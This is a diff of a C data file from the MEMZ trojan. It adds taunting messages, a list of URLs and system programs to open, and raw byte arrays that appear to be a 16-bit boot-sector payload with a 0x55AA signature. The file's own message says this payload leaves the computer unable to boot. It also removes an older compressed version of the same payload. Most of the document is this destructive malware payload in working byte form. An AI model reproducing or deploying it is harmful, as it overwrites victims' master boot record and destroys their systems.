0x1A, 0x04, 0x68, 0x08, 0x87, - 0x39, 0x39, 0x39, 0x39, 0xF9, 0x39, 0x39, 0x39, 0x04, 0xB0, 0x0C, 0x9A, - 0x39, 0x30, 0x00, 0xE0, 0xEE, 0xEE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE, - 0xDE, 0x0E, 0x70, 0x77, 0x77, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, - 0x77, 0x70, 0x01, 0x03, 0xA7, 0x19, 0x83, 0x99, 0x99, 0x99, 0x99, 0x05, - 0x00, 0x04, 0x81, 0x99, 0x9F, 0x05, 0x04, 0x06, 0x05, 0x00, 0x09, 0x88, - 0x99, 0x99, 0x99, 0x00, 0x77, 0x77, 0x70, 0x00, 0x01, 0x03, 0x88, 0x04, - 0x83, 0x01, 0x01, 0x01, 0x01, 0x05, 0x21, 0x06, 0x05, 0x2B, 0x05, 0x03, - 0x05, 0x1B, 0x83, 0x91, 0x91, 0x91, 0x91, 0x05, 0x50, 0x04, 0x05, 0x48, - 0x10, 0x05, 0x5C, 0x04, 0x05, 0x27, 0x04, 0x05, 0x6A, 0x05, 0x05, 0x59, - 0x07, 0x05, 0x6D, 0x07, 0x01, 0xB8, 0x98, 0x00, 0x9F, 0xF1, 0x06, 0x99, - 0x73, 0x05, 0xAC, 0x93, 0x07, 0x7F, 0x06, 0x07, 0x7F, 0x4B, 0x82, 0xF1, - 0x11, 0x1F, 0x05, 0xAB, 0xFF, 0x08, 0xAA, 0xBB, 0x02, 0x50, 0xF9, 0x03, - 0x48, 0x05, 0x03, 0x4E, 0x05, 0x80, 0x11, 0x03, 0x53, 0x1C, 0x03, 0x70, - 0x18, 0x84, 0xEE, 0xE0, 0xE0, 0xEE, 0xEE, 0x03, 0x8D, 0x0C, 0x03, 0x98, - 0x08, 0x81, 0xE0, 0x00, 0x03, 0xA2, 0x1D, 0x03, 0xC0, 0x18, 0x04, 0x44, - 0x04, 0x81, 0xE0, 0xE0, 0x03, 0xDE, 0x0A, 0x80, 0xDD, 0x03, 0xE8, 0x27, - 0x04, 0x11, 0x1A, 0x83, 0x70, 0x70, 0x77, 0x77, 0x04, 0x2E, 0x0A, 0x04, - 0x37, 0x28, 0x04, 0x60, 0x1C, 0x80, 0x03, 0x04, 0x7D, 0x0B, 0x04, 0x87, - 0x28, 0x04, 0xC0, 0x0D, 0x04, 0xBD, 0x10, 0x80, 0x39, 0x04, 0xCE, 0x0B, - 0x04, 0xD8, 0x27, 0x05, 0x10, 0x0C, 0x0C, 0xD0, 0x0C, 0x05, 0x17, 0x08, - 0x05, 0x20, 0x0B, 0x05, 0x2A, 0x25, 0x05, 0x62, 0x06, 0x80, 0xF1, 0x05, - 0x57, 0x15, 0x05, 0x71, 0x07, 0x05, 0x72, 0x11, 0x05, 0x82, 0x2A, 0x05, - 0xAD, 0xFF, 0x06, 0xB1, 0xFF, 0x07, 0xB5, 0xAE, 0x81, 0x11, 0x11, 0x01, - 0x92, 0x4F, 0x00, 0xDC, 0xB5, 0x0E, 0xFC, 0x9C, 0x00, 0x4B, 0x54, 0x0A, - 0x59, 0x15, 0x12, 0x25, 0x0A, 0x84, 0x10, 0x0E, 0x0E, 0x0E, 0x0E, 0x12, - 0x40, 0x04, 0x12, 0x40, 0x08, 0x0A, 0x81, 0x1F, 0x80, 0x11, 0x0A, 0xA9, - 0x15, 0x12, 0x75, 0x09, 0x83, 0x00, 0xEE, 0xEE, 0xED, 0x0C, 0x04, 0x05, - 0x80, 0xDC, 0x0B, 0xB5, 0x04, 0x0A, 0xCD, 0x05, 0x0A, 0xD1, 0x41, 0x0C, - 0x01, 0x08, 0x82, 0xDD, 0xD0, 0xD0, 0x12, 0x99, 0x04, 0x12, 0xA1, 0x04, - 0x0A, 0x2F, 0x1B, 0x0B, 0x49, 0x10, 0x13, 0x10, 0x0E, 0x0B, 0x5E, 0x08, - 0x12, 0x9A, 0x04, 0x80, 0x00, 0x0B, 0x6C, 0x04, 0x03, 0x4F, 0x06, 0x0B, - 0x75, 0x1B, 0x0B, 0x99, 0x0F, 0x0B, 0x98, 0x0F, 0x13, 0x2E, 0x05, 0x12, - 0x9A, 0x05, 0x0C, 0x57, 0x07, 0x0C, 0xB1, 0x05, 0x0B, 0x74, 0x1C, 0x04, - 0x10, 0x1A, 0x82, 0xA0, 0xA0, 0xA0, 0x03, 0xDD, 0x04, 0x13, 0x83, 0x06, - 0x80, 0xCD, 0x13, 0x89, 0x05, 0x80, 0x7F, 0x0C, 0x64, 0x04, 0x13, 0xDB, - 0x06, 0x0C, 0x68, 0x1F, 0x0C, 0x30, 0x11, 0x0B, 0x72, 0x04, 0x04, 0x2C, - 0x05, 0x13, 0x32, 0x0B, 0x80, 0x77, 0x13, 0x91, 0x05, 0x80, 0x07, 0x14, - 0x2C, 0x05, 0x13, 0xE8, 0x18, 0x0C, 0x89, 0x15, 0x14, 0x55, 0x04, 0x88, - 0x03, 0x03, 0x03, 0x03, 0x33, 0x00, 0xEE, 0xEE, 0xDE, 0x12, 0xE2, 0x07, - 0x80, 0x0D, 0x0C, 0x64, 0x05, 0x81, 0x70, 0x70, 0x04, 0x2B, 0x04, 0x80, - 0x77, 0x0C, 0xB5, 0x1A, 0x05, 0x0E, 0x0E, 0x0C, 0xDD, 0x11, 0x84, 0x07, - 0xE0, 0xE0, 0xE0, 0xE0, 0x14, 0xC0, 0x04, 0x87, 0xE0, 0xE0, 0xE0, 0x00, - 0x70, 0x70, 0x70, 0x70, 0x14, 0xCC, 0x04, 0x80, 0x70, 0x04, 0xE5, 0x1B, - 0x81, 0xF1, 0x1F, 0x11, 0xCF, 0x05, 0x05, 0x50, 0x17, 0x80, 0x00, 0x14, - 0xD4, 0x04, 0x82, 0x01, 0x70, 0x70, 0x14, 0x38, 0x07, 0x15, 0x13, 0x05, - 0x15, 0x13, 0x0A, 0x05, 0xAD, 0xFF, 0x0F, 0xE2, 0xE7, 0x0F, 0xD9, 0x93, - 0x05, 0xAC, 0xFF, 0x16, 0x23, 0xA0, 0x17, 0xA5, 0x04, 0x08, 0x18, 0x4D, - 0x08, 0x14, 0x5B, 0x12, 0x20, 0xFF, 0x13, 0x1F, 0xAD, 0x81, 0x07, 0x07, - 0x13, 0xCE, 0x4A, 0x83, 0xA0, 0x07, 0x77, 0x70, 0x14, 0x1C, 0x4C, 0x84, - 0x03, 0x70, 0x70, 0x03, 0x33, 0x14, 0x6D, 0x34, 0x14, 0xA2, 0x1C, 0x81, - 0x90, 0x07, 0x14, 0xBF, 0x31, 0x05, 0x49, 0x1D, 0x15, 0x0E, 0xFF, 0x18, - 0x97, 0xFF, 0x08, 0x15, 0x94, 0x14, 0xF0, 0x07, 0x05, 0xAD, 0xFF, 0x16, - 0x2D, 0xFF, 0x20, 0x84, 0x4C, 0x0A, 0x50, 0x1E, 0x81, 0x44, 0x40, 0x1A, - 0x10, 0x30, 0x0A, 0xA0, 0x20, 0x1A, 0x60, 0x5A, 0x81, 0xD0, 0xD0, 0x22, - 0x38, 0x05, 0x0B, 0x21, 0x04, 0x21, 0xF1, 0x1B, 0x0B, 0x40, 0x19, 0x1B, - 0x49, 0x0A, 0x22, 0x34, 0x06, 0x1B, 0x0A, 0x07, 0x81, 0xDD, 0xEE, 0x14, - 0x18, 0x04, 0x03, 0xA6, 0x31, 0x81, 0xE0, 0x07, 0x03, 0x89, 0x04, 0x0B, - 0xAD, 0x06, 0x1B, 0xA1, 0x06, 0x1B, 0x5A, 0x26, 0x1B, 0x7F, 0x18, 0x81, - 0x0A, 0x0A, 0x1C, 0xA2, 0x04, 0x1B, 0x9D, 0x0B, 0x1B, 0xA9, 0x27, 0x0C, - 0x2F, 0x21, 0x22, 0xD1, 0x0B, 0x1B, 0xFC, 0x24, 0x0C, 0x7F, 0x1E, 0x80, - 0x30, 0x1C, 0x3E, 0x0A, 0x1C, 0x49, 0x27, 0x1C, 0x6F, 0x1C, 0x80, 0x90, - 0x23, 0x18, 0x06, 0x1C, 0x93, 0x2E, 0x05, 0x50, 0x1B, 0x15, 0x0E, 0xFF, - 0x10, 0xD9, 0xF8, 0x80, 0xF1, 0x26, 0x50, 0x4D, 0x00, 0x9E, 0x47, 0x82, - 0xF1, 0xF1, 0x1F, 0x26, 0xA2, 0x4E, 0x05, 0xAB, 0xFF, 0x06, 0xE0, 0xFF, - 0x21, 0xB6, 0xD3, 0x03, 0x49, 0x05, 0x22, 0x8E, 0x05, 0x03, 0x53, 0x35, - 0x0B, 0x58, 0x0E, 0x23, 0xC5, 0x08, 0x03, 0x9E, 0x3A, 0x0B, 0xA8, 0x0B, - 0x2A, 0x0A, 0x05, 0x03, 0xE8, 0x41, 0x0B, 0xF9, 0x08, 0x23, 0x71, 0x0B, - 0x04, 0x3C, 0x40, 0x23, 0xBC, 0x10, 0x04, 0x8C, 0x30, 0x23, 0xFC, 0x1C, - 0x24, 0x17, 0x05, 0x0C, 0xAE, 0x22, 0x80, 0x1F, 0x24, 0x40, 0x1D, 0x80, - 0x77, 0x24, 0x5E, 0x0C, 0x86, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x0C, 0xF4, 0x04, 0x29, 0x0C, 0x1B, 0x24, 0x90, 0x20, 0x2C, 0x7B, 0x05, - 0x2C, 0x6B, 0x05, 0x24, 0xAB, 0x0F, 0x00, 0x38, 0xFF, 0x2D, 0x19, 0x7F, - 0x2C, 0xFF, 0x4E, 0x27, 0x37, 0x98, 0x26, 0x9D, 0x9A, 0x05, 0xAD, 0xFF, - 0x25, 0xF5, 0x5A, 0x1F, 0x6F, 0x40, 0x0A, 0x20, 0x30, 0x19, 0xF0, 0x1E, - 0x80, 0x10, 0x0A, 0x6F, 0x31, 0x1A, 0x40, 0x20, 0x02, 0xF0, 0x80, 0x1A, - 0xE0, 0x18, 0x0D, 0x01, 0x04, 0x80, 0x60, 0x1A, 0xFD, 0x09, 0x03, 0x96, - 0x2A, 0x1B, 0x30, 0x18, 0x80, 0x0E, 0x03, 0xD9, 0x87, 0x1B, 0xD0, 0x18, - 0x33, 0x4A, 0x05, 0x04, 0x7D, 0x33, 0x14, 0x50, 0x19, 0x33, 0x9B, 0x04, - 0x04, 0xCD, 0x29, 0x30, 0xA1, 0x0A, 0x0C, 0xD1, 0x1F, 0x05, 0x1F, 0x25, - 0x1E, 0x89, 0x13, 0x2C, 0x60, 0x15, 0x05, 0x6C, 0x27, 0x08, 0x12, 0xFF, - 0x30, 0x33, 0xFD, 0x07, 0xBE, 0xFF, 0x2D, 0x1A, 0xFF, 0x2E, 0x19, 0x93, - 0x31, 0x36, 0x0B, 0x80, 0xF0, 0x31, 0x3C, 0xED, 0x0B, 0x19, 0x27, 0x1A, - 0xE0, 0x19, 0x81, 0x60, 0x60, 0x1A, 0xFB, 0x0B, 0x0B, 0x66, 0x2A, 0x32, - 0xA0, 0x18, 0x0B, 0xA8, 0x88, 0x33, 0x40, 0x1C, 0x0C, 0x4C, 0x34, 0x33, - 0x90, 0x1D, 0x80, 0x33, 0x0C, 0x9E, 0x1F, 0x35, 0xE0, 0x13, 0x0C, 0xD0, - 0x50, 0x24, 0x89, 0x1D, 0x0D, 0x3D, 0x1D, 0x0F, 0xD9, 0xFF, 0x06, 0xBC, - 0xFF, 0x0F, 0x88, 0xFF, 0x10, 0x84, 0xFF, 0x26, 0x54, 0xCA, 0x21, 0xC0, - 0xCA, 0x1A, 0xBA, 0x26, 0x22, 0xB0, 0x29, 0x1B, 0x09, 0x27, 0x2A, 0xD0, - 0x18, 0x42, 0x4A, 0x06, 0x13, 0x7E, 0x82, 0x2B, 0x70, 0x18, 0x14, 0x18, - 0x38, 0x2B, 0xC0, 0x19, 0x84, 0x09, 0x09, 0x09, 0x09, 0x39, 0x1C, 0x3E, - 0x4F, 0x14, 0xBD, 0x33, 0x05, 0x50, 0x1C, 0x24, 0xA9, 0x15, 0x80, 0xF1, - 0x15, 0x22, 0xFF, 0x16, 0x51, 0xFF, 0x17, 0x50, 0xFF, 0x18, 0x4D, 0xFF, - 0x36, 0x7C, 0xD2, 0x41, 0x00, 0xFF, 0x41, 0xFF, 0xAD, 0x1B, 0x9C, 0x34, - 0x42, 0xE0, 0x18, 0x80, 0x30, 0x1B, 0xE9, 0x37, 0x43, 0x30, 0x18, 0x84, - 0x09, 0x70, 0x70, 0x09, 0x39, 0x43, 0x4D, 0x50, 0x1C, 0x8D, 0x33, 0x43, - 0xD0, 0x1D, 0x43, 0xEE, 0x0C, 0x82, 0xF1, 0xF1, 0x1F, 0x24, 0xBA, 0x4F, - 0x46, 0x55, 0xD1, 0x1E, 0x3B, 0xFF, 0x01, 0x5B, 0x37, 0x05, 0xAD, 0xFF, - 0x16, 0x29, 0xFF, 0x4F, 0x30, 0x80, 0x19, 0xF0, 0xCA, 0x22, 0x8A, 0x26, - 0x1A, 0xE0, 0x29, 0x22, 0xD9, 0x27, 0x3A, 0x70, 0x17, 0x23, 0x17, 0x89, - 0x3B, 0x10, 0x20, 0x23, 0xC0, 0x30, 0x33, 0x90, 0x1F, 0x24, 0x0F, 0x81, - 0x4B, 0x99, 0x1B, 0x4B, 0xBD, 0x04, 0x44, 0x01, 0x05, 0x40, 0x84, 0x06, - 0x4B, 0xCC, 0x48, 0x2F, 0x50, 0xD0, 0x3F, 0xE2, 0x9D, 0x40, 0x81, 0x04, - 0x2F, 0x01, 0xFF, 0x05, 0xAD, 0xFF, 0x06, 0xFA, 0xFF, 0x50, 0x80, 0xE9, - 0x2A, 0x59, 0x27, 0x3A, 0x20, 0x26, 0x2A, 0xA6, 0x2A, 0x3A, 0x70, 0x23, - 0x2A, 0xF3, 0x7D, 0x52, 0x80, 0x2C, 0x33, 0x6C, 0x3B, 0x80, 0x3F, 0x52, - 0xE8, 0x10, 0x2B, 0xE8, 0x27, 0x53, 0x1F, 0x16, 0x80, 0xF9, 0x5B, 0x02, - 0x04, 0x2C, 0x2A, 0x35, 0x53, 0x6F, 0x15, 0x80, 0xF1, 0x5B, 0x45, 0x05, - 0x80, 0xF1, 0x2C, 0x7B, 0x31, 0x08, 0x4A, 0xFF, 0x57, 0x90, 0x97, 0x5C, - 0xD1, 0x4F, 0x5D, 0x22, 0x4F, 0x87, 0x7E, 0x27, 0x12, 0x27, 0x4C, 0x46, - 0xB8, 0x44, 0x5D, 0xC0, 0x05, 0x8E, 0x26, 0xB8, 0x24, 0x34, 0x24, 0xBF, - 0x23, 0x34, 0x24, 0x00, 0x25, 0xB8, 0x44, 0x4C, 0x46, 0x5D, 0xC0, 0x08, - 0x5D, 0xD4, 0x05, 0xA0, 0x24, 0x34, 0x24, 0x89, 0x23, 0xBF, 0x23, 0x89, - 0x23, 0x34, 0x24, 0x4C, 0x46, 0x9D, 0x45, 0x7E, 0x27, 0x7E, 0x27, 0x70, - 0x49, 0xF0, 0x27, 0x68, 0x28, 0x70, 0x29, 0x70, 0x69, 0x68, 0x48, 0xF0, - 0x47, 0x5D, 0xFE, 0x06, 0x87, 0x68, 0x28, 0x7E, 0x27, 0x4C, 0x26, 0x9D, - 0x25, 0x5E, 0x12, 0x04, 0x5E, 0x10, 0x04, 0x5E, 0x0E, 0x04, 0x85, 0x70, - 0x29, 0x7E, 0x47, 0x4C, 0x46, 0x5E, 0x16, 0x0C, 0x83, 0xF0, 0x27, 0x7E, - 0x27, 0x5E, 0x0A, 0x08, 0x81, 0xF0, 0x47, 0x5E, 0x0E, 0x08, 0x5E, 0x46, - 0x04, 0x5E, 0x3C, 0x05, 0x84, 0x48, 0x70, 0x49, 0x68, 0x48, 0x5D, 0xF4, - 0x66, 0x85, 0x70, 0x49, 0x99, 0x2C, 0x39, 0x2B, 0x5E, 0xC0, 0x06, 0x5E, - 0xAA, 0x06, 0x83, 0x70, 0x29, 0x12, 0x27, 0x5D, 0xC8, 0x06, 0x81, 0x70, - 0x49, 0x5E, 0xC6, 0x08, 0x81, 0x99, 0x2C, 0x5E, 0xD4, 0x04, 0x5E, 0xB6, - 0x04, 0x87, 0x99, 0x2C, 0xFB, 0x2E, 0x24, 0x2E, 0x99, 0x2C, 0x5E, 0xC0, - 0x0E, 0x5E, 0xCC, 0x08, 0x5F, 0x00, 0x04, 0x5E, 0xF6, 0x04, 0x83, 0x70, - 0x29, 0x00, 0x2A, 0x5F, 0x0C, 0x06, 0x5E, 0xD2, 0x0C, 0x81, 0x00, 0x4A, - 0x5E, 0xC0, 0x6C, 0xBC, 0x68, 0x48, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x63, - 0x6F, 0x6D, 0x70, 0x75, 0x74, 0x65, 0x72, 0x20, 0x68, 0x61, 0x73, 0x20, - 0x62, 0x65, 0x65, 0x6E, 0x20, 0x74, 0x72, 0x61, 0x73, 0x68, 0x65, 0x64, - 0x20, 0x62, 0x79, 0x20, 0x74, 0x68, 0x65, 0x20, 0x4D, 0x45, 0x4D, 0x5A, - 0x20, 0x74, 0x72, 0x6F, 0x6A, 0x61, 0x6E, 0x2E, 0x20, 0x4E, 0x6F, 0x77, - 0x20, 0x65, 0x6E, 0x6A, 0x6F, 0x5F, 0xBC, 0x06, 0x8A, 0x4E, 0x79, 0x61, - 0x6E, 0x20, 0x43, 0x61, 0x74, 0x2E, 0x2E, 0x2E -}; - -const size_t code1_len = sizeof(code1); -const size_t code2_len = sizeof(code2); -const size_t msg_len = sizeof(msg); +#include "data.h" + +#ifndef CLEAN +const unsigned char msg[] = "YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.\r\n\r\nYour computer won't boot up again,\r\nso use it as long as you can!\r\n\r\n:D\r\n\r\nTrying to kill MEMZ will cause your system to be\r\ndestroyed instantly, so don't try it :D"; +#endif + +const char *sites[] = { + "http://google.co.ck/search?q=best+way+to+kill+yourself", + "http://google.co.ck/search?q=how+2+remove+a+virus", + "http://google.co.ck/search?q=mcafee+vs+norton", + "http://google.co.ck/search?q=how+to+send+a+virus+to+my+friend", + "http://google.co.ck/search?q=minecraft+hax+download+no+virus", + "http://google.co.ck/search?q=how+to+get+money", + "http://google.co.ck/search?q=bonzi+buddy+download+free", + "http://google.co.ck/search?q=how+2+buy+weed", + "http://google.co.ck/search?q=how+to+code+a+virus+in+visual+basic", + "http://google.co.ck/search?q=what+happens+if+you+delete+system32", + "http://google.co.ck/search?q=g3t+r3kt", + "http://google.co.ck/search?q=batch+virus+download", + "http://google.co.ck/search?q=virus.exe", + "http://google.co.ck/search?q=internet+explorer+is+the+best+browser", + "http://google.co.ck/search?q=facebook+hacking+tool+free+download+no+virus+working+2016", + "http://google.co.ck/search?q=virus+builder+legit+free+download", + "http://google.co.ck/search?q=how+to+create+your+own+ransomware", + "http://google.co.ck/search?q=how+to+remove+memz+trojan+virus", + "http://google.co.ck/search?q=my+computer+is+doing+weird+things+wtf+is+happenin+plz+halp", + "http://google.co.ck/search?q=dank+memz", + "http://google.co.ck/search?q=how+to+download+memz", + "http://google.co.ck/search?q=half+life+3+release+date", + "http://google.co.ck/search?q=is+illuminati+real", + "http://google.co.ck/search?q=montage+parody+making+program+2016", + "http://google.co.ck/search?q=the+memz+are+real", + "http://google.co.ck/search?q=stanky+danky+maymays", + "http://google.co.ck/search?q=john+cena+midi+legit+not+converted", + "http://google.co.ck/search?q=vinesauce+meme+collection", + "http://google.co.ck/search?q=skrillex+scay+onster+an+nice+sprites+midi", + "http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45", + "http://motherboard.vice.com/read/watch-this-malware-turn-a-computer-into-a-digital-hellscape", + "http://play.clubpenguin.com", + "http://pcoptimizerpro.com", + "http://softonic.com", + "calc", + "notepad", + "cmd", + "write", + "regedit", + "explorer", + "taskmgr", + "msconfig", + "mspaint", + "devmgmt.msc", + "control", + "mmc", +}; + +const size_t nSites = sizeof(sites) / sizeof(void *); + +#ifndef CLEAN +const char *msgs[] = { + "YOU KILLED MY TROJAN!\r\nNow you are going to die.", + "REST IN PISS, FOREVER MISS.", + "I WARNED YOU...", + "HAHA N00B L2P G3T R3KT", + "You failed at your 1337 h4x0r skillz.", + "YOU TRIED SO HARD AND GOT SO FAR, BUT IN THE END, YOUR PC WAS STILL FUCKED!", + "HACKER!\r\nENJOY BAN!", + "GET BETTER HAX NEXT TIME xD", + "HAVE FUN TRYING TO RESTORE YOUR DATA :D", + "|\\/|3|\\/|2", + "BSOD INCOMING", + "VIRUS PRANK (GONE WRONG)", + "ENJOY THE NYAN CAT", + "Get dank antivirus m9!", + "You are an idiot!\r\nHA HA HA HA HA HA HA", + "#MakeMalwareGreatAgain", + "SOMEBODY ONCE TOLD ME THE MEMZ ARE GONNA ROLL ME", + "Why did you even tried to kill MEMZ?\r\nYour PC is fucked anyway.", + "SecureBoot sucks.", + "gr8 m8 i r8 8/8", + "Have you tried turning it off and on again?", + "", + "Greetings to all GAiA members!", + "Well, hello there. I don't believe we've been properly introduced. I'm Bonzi!", + "'This is everything I want in my computer'\r\n - danooct1 2016", + "'Uh, Club Penguin. Time to get banned!'\r\n - danooct1 2016", +}; + +const size_t nMsgs = sizeof(msgs) / sizeof(void *); +#endif + +const char *sounds[] = { + "SystemHand", + "SystemQuestion", + "SystemExclamation" +}; + +const size_t nSounds = sizeof(sounds) / sizeof(void *); + + +#ifndef CLEAN +// Split into 2 parts to save some space. + +const unsigned char code1[] = { + 0xBB, 0xE0, 0x07, 0x8E, 0xC3, 0x8E, 0xDB, 0xB8, 0x04, 0x02, 0xB9, 0x02, + 0x00, 0xB6, 0x00, 0xBB, 0x00, 0x00, 0xCD, 0x13, 0x31, 0xC0, 0x89, 0xC3, + 0x89, 0xC1, 0x89, 0xC2, 0xBE, 0x00, 0x00, 0xBF, 0x00, 0x40, 0xAC, 0x81, + 0xFE, 0x9E, 0x07, 0x73, 0x35, 0x3C, 0x80, 0x73, 0x03, 0xE9, 0x10, 0x00, + 0x24, 0x7F, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9, 0x80, 0xF9, 0xFF, 0x75, + 0xF7, 0xE9, 0xE2, 0xFF, 0x88, 0xC4, 0xAC, 0x89, 0xC3, 0xAC, 0x89, 0xF2, + 0x89, 0xDE, 0x81, 0xC6, 0x00, 0x40, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9, + 0x80, 0xF9, 0x00, 0x75, 0xF7, 0x89, 0xD6, 0xE9, 0xC4, 0xFF, 0xB0, 0xB6, + 0xE6, 0x43, 0xB8, 0x03, 0x10, 0xB3, 0x00, 0xCD, 0x10, 0xBF, 0x00, 0x00, + 0xBA, 0xC0, 0x9D, 0xB9, 0x00, 0xB8, 0x8E, 0xC1, 0xB8, 0x00, 0x00, 0xB9, + 0xD0, 0x07, 0xF3, 0xAB, 0xBE, 0x9C, 0x9F, 0xBF, 0x00, 0x00, 0xE4, 0x61, + 0x0C, 0x03, 0xE6, 0x61, 0xB3, 0x01, 0x52, 0xB4, 0x86, 0xB9, 0x00, 0x00, + 0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A, 0x81, 0xFE, 0xE8, 0x9F, 0x7D, 0x04, + 0xAC, 0xB4, 0xF0, 0xAB, 0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xE3, 0x56, + 0x89, 0xD6, 0xAD, 0x89, 0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0, + 0xE6, 0x42, 0xC0, 0xED, 0x05, 0xC0, 0xE5, 0x02, 0x88, 0xEB, 0x89, 0xF2, + 0x5E, 0x81, 0xFA, 0xF4, 0x9D, 0x75, 0xC3, 0xBE, 0x00, 0x40, 0xBF, 0x00, + 0x00, 0xB8, 0xE0, 0x07, 0x8E, 0xD8, 0xB8, 0x00, 0xB8, 0x8E, 0xC0, 0xFE, + 0xCB, 0xE9, 0x20, 0x00, 0xB0, 0xDC, 0xAA, 0xAC, 0xAA, 0x81, 0xFE, 0xC0, + 0x9D, 0x74, 0x42, 0x81, 0xFF, 0xA0, 0x0F, 0x74, 0x03, 0xE9, 0xEC, 0xFF, + 0x52, 0xB4, 0x86, 0xB9, 0x01, 0x00, 0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A, + 0xBF, 0x00, 0x00, 0x81, 0xFA, 0x9C, 0x9F, 0x75, 0x03, 0xBA, 0xF4, 0x9D, + 0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xCD, 0x56, 0x89, 0xD6, 0xAD, 0x89, + 0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0, 0xE6, 0x42, 0xC0, 0xED, + 0x05, 0x88, 0xEB, 0x89, 0xF2, 0x5E, 0xE9, 0xB3, 0xFF, 0xBE, 0x00, 0x40, + 0xE9, 0xC1, 0xFF +}; + +const unsigned char code2[] = { + 0x55, 0xAA, 0x83, 0x11, 0x11, 0x11, 0x11, 0x00, 0x00, 0x04, 0x00, 0x00, + 0x08, 0x00, 0x00, 0x10, 0x00, 0x00, 0x20, 0x00, 0x35, 0x0B, 0x83, 0xF1, + 0xF1, 0x11, 0xF1, 0x00, 0x00, 0x4B, 0x00, 0x96, 0x04, 0x80, 0xFF, 0x00, + 0x4F, 0x4F, 0x00, 0x9F, 0x4F, 0x00, 0xEA, 0x53, 0x82, 0x1F, 0xF1, 0x1F, + 0x01, 0x42, 0x4E, 0x00, 0x4E, 0x50, 0x02, 0x12, 0x1F, 0x83, 0x10, 0x10, + 0x10, 0x10, 0x02, 0x50, 0x04, 0x02, 0x50, 0x08, 0x80, 0x10, 0x02, 0x31, + 0x1F, 0x83, 0x14, 0x14, 0x14, 0x14, 0x02, 0x80, 0x04, 0x83, 0x44, 0x44, + 0x44, 0x44, 0x02, 0x88, 0x04, 0x02, 0x80, 0x0E, 0x87, 0x40, 0x0E, 0xEE, + 0xEE, 0xED, 0xED, 0xED, 0xED, 0x02, 0xA2, 0x04, 0x02, 0xA5, 0x05, 0x82, + 0xEE, 0xEE, 0x0E, 0x02, 0x60, 0x1E, 0x02, 0x88, 0x08, 0x83, 0x46, 0x46, + 0x46, 0x46, 0x02, 0xD8, 0x04, 0x02, 0xD0, 0x0E, 0x8C, 0x00, 0xEE, 0xED, + 0xDD, 0xDC, 0xDD, 0xDD, 0xDD, 0xDD, 0xCD, 0xDD, 0xDD, 0xCD, 0x02, 0xF3, + 0x04, 0x83, 0xDD, 0xED, 0xEE, 0x00, 0x02, 0xB3, 0x1D, 0x83, 0x66, 0x66, + 0x66, 0x66, 0x03, 0x20, 0x04, 0x03, 0x20, 0x08, 0x03, 0x22, 0x0E, 0x81, + 0x00, 0xEE, 0x02, 0xFB, 0x05, 0x03, 0x41, 0x04, 0x83, 0xD0, 0x07, 0x07, + 0xD0, 0x02, 0xF9, 0x04, 0x84, 0xEE, 0x00, 0x10, 0x07, 0x07, 0x02, 0xB2, + 0x1A, 0x83, 0x6E, 0x6E, 0x6E, 0x6E, 0x03, 0x70, 0x04, 0x83, 0xEE, 0xEE, + 0xEE, 0xEE, 0x03, 0x78, 0x04, 0x03, 0x70, 0x08, 0x85, 0x00, 0x07, 0x07, + 0x00, 0xE0, 0xEE, 0x03, 0x3E, 0x08, 0x8F, 0xCD, 0xDD, 0xDD, 0x00, 0x77, + 0x77, 0x77, 0x07, 0xD0, 0xD0, 0xD0, 0xE0, 0x07, 0x77, 0x77, 0x77, 0x03, + 0x02, 0x1A, 0x03, 0x78, 0x08, 0x83, 0xEA, 0xEA, 0xEA, 0xEA, 0x03, 0xC8, + 0x04, 0x03, 0xC0, 0x08, 0x85, 0x0A, 0x00, 0x70, 0x77, 0x07, 0x00, 0x03, + 0x8E, 0x05, 0x02, 0xFA, 0x04, 0x81, 0xDC, 0xD0, 0x03, 0xA2, 0x04, 0x80, + 0x77, 0x03, 0xEA, 0x04, 0x03, 0xEE, 0x04, 0x03, 0x55, 0x1A, 0x83, 0xAA, + 0xAA, 0xAA, 0xAA, 0x04, 0x10, 0x04, 0x04, 0x10, 0x08, 0x04, 0x16, 0x0A, + 0x85, 0x0A, 0x00, 0x70, 0x70, 0x00, 0xEE, 0x02, 0xF9, 0x07, 0x03, 0x98, + 0x05, 0x80, 0xF0, 0x04, 0x38, 0x04, 0x80, 0x70, 0x04, 0x3B, 0x05, 0x03, + 0xA6, 0x19, 0x83, 0xA3, 0xA3, 0xA3, 0xA3, 0x04, 0x60, 0x04, 0x83, 0x33, + 0x33, 0x33, 0x33, 0x04, 0x68, 0x04, 0x04, 0x60, 0x0D, 0x83, 0x03, 0x00, + 0xEE, 0xDE, 0x02, 0xF1, 0x04, 0x03, 0x96, 0x07, 0x81, 0x77, 0x70, 0x04, + 0x3F, 0x04, 0x04, 0x8C, 0x04, 0x04, 0x46, 0x1A, 0x04, 0x68, 0x08, 0x87, + 0x39, 0x39, 0x39, 0x39, 0xF9, 0x39, 0x39, 0x39, 0x04, 0xB0, 0x0C, 0x9A, + 0x39, 0x30, 0x00, 0xE0, 0xEE, 0xEE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE, + 0xDE, 0x0E, 0x70, 0x77, 0x77, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, + 0x77, 0x70, 0x01, 0x03, 0xA7, 0x19, 0x83, 0x99, 0x99, 0x99, 0x99, 0x05, + 0x00, 0x04, 0x81, 0x99, 0x9F, 0x05, 0x04, 0x06, 0x05, 0x00, 0x09, 0x88, + 0x99, 0x99, 0x99, 0x00, 0x77, 0x77, 0x70, 0x00, 0x01, 0x03, 0x88, 0x04, + 0x83, 0x01, 0x01, 0x01, 0x01, 0x05, 0x21, 0x06, 0x05, 0x2B, 0x05, 0x03, + 0x05, 0x1B, 